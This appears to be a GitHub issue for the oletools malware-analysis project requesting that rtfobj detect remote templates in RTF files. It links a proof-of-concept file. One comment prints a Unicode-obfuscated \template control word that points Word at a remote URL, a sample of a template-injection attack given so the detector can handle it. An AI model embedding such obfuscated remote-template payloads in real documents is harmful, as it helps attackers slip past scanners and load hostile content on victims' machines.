search

decalage2 / oletools

oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.
http://www.decalage.info/python/oletools
Other
2.89k stars 565 forks source link

rtfobj: detect remote templates #736

Open decalage2 opened 2 years ago

decalage2 commented 2 years ago

See https://twitter.com/VessOnSecurity/status/1489235792832704519 PoC from @bontchev: http://bontchev.my.contact.bg/poc.rtf

The remote template URL is in a \template control word:

image

bontchev commented 2 years ago

Note that the template path could be Unicode-encoded, e.g.,

{\*\template \u-65432?\u-65420?\u-65420?\u-65424?\u-65478?\u-65489?\u-65489?\u-65487?\u-65480?\u-65480?\u-65490?\u-65486?\u-65487?\u-65484?\u-65490?\u-65487?\u-65485?\u-65484?\u-65490?\u-65487?\u-65487?\u-65482?\u-65489?\u-65459?\u-65431?\u-65437?\u-65422?\u-65425?\u-65421?\u-65425?\u-65434?\u-65420?\u-65504?\u-65449?\u-65425?\u-65422?\u-65436?\u-65504?\u-65452?\u-65435?\u-65427?\u-65424?\u-65428?\u-65439?\u-65420?\u-65435?\u-65490?\u-65436?\u-65425?\u-65437?\u-65416?}